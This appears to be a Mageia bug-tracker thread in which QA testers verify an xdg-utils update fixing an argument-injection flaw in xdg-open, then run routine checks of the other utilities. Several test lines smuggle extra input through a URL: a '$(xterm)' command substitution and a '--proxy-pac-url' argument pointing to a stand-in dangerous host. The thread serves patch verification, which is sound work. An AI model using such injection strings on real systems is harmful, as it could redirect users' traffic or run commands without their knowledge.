Fedora has issued an advisory on May 17:
The issue is fixed upstream in 1.1.3.
Mageia 5 is also affected.
The RedHat bug has links to the upstream commit to fix it and bug report:
Note that they followed up with a regression fix on May 30:
Pushed xdg-utils-1.1.3-1 to mga6 core/updates_testing.
Updated xdg-utils package fixes security vulnerability:
The open_envvar function in xdg-open in xdg-utils before 1.1.3 does not validate
strings before launching the program specified by the BROWSER environment
variable, which might allow remote attackers to conduct argument-injection
attacks via a crafted URL, as demonstrated by %s in this environment variable
Updated packages in core/updates_testing:
MGA6-32 on IBM Thinkpad R50e MATE
No installation issues.
Ref to bug 14932 Comment 16
Giving this command at CLI
$ xdg-open 'http://127.0.0.1/$(xterm)'
results in a new tabblad in Firefox with "error 404"
$ xdg-open 'http://127.0.0.1/$%(xterm)'
as in the same comment results in error 400
I let people with more understanding judge this issue.
$ BROWSER="firefox %s" xdg-open "http://www.example.com/ --incognito"
This shows a yellow page with a report of an XML error.
'http://www.example.com/%20--incognito' in the address bar.
Not possible to say whether this page is being opened at the given URL or locally.
$ BROWSER="firefox %s" xdg-open "http://www.example.com/ --proxy-pac-url=http://dangerous.example.com/proxy.pac"
The behaviour is the same for the first example above, so, in agreement with Herman I shall leave the interpretation to others. The older PoC gave the same results as in comment 4.
Utilities available: man or --help for more information.
* xdg-desktop-icon Install icons to the desktop
* xdg-desktop-menu Install desktop menu items
* xdg-email Send mail using the user's preferred e-mail composer
* xdg-icon-resource Install icon resources
* xdg-mime Query information about file type handling and install descriptions for new file types
* xdg-open Open a file or URL in the user's preferred application
* xdg-screensaver Control the screensaver
* xdg-settings Get various settings from the desktop environment
$ xdg-email --cc email@example.com --subject "xdg-utils testing" --body "Can you hear me Muther
> I say, can you hear me Muther?" <...@....>.com
This popped up a mail composer window in thunderbird with the specified fields filled in, message ready to be sent.
Fiddled with the desktop and icon install stuff but got nowhere with those.
$ xdg-open http://exoplanet.eu
No problem with that.
$ xdg-settings get default-web-browser
Installed iceape but did no configuration.
$ BROWSER=/usr/bin/iceape xdg-open http://exoplanet.eu
The site came up OK in iceape but there were backend errors reported and entreaties to run mozplugger-update. Ignored those.
This package obviously requires more background knowledge for effective operation but on the face of it seems to be working.
RPM Packages =>
advisory, has_procedure, validated_updateCC:
An update for this issue has been pushed to the Mageia Updates repository.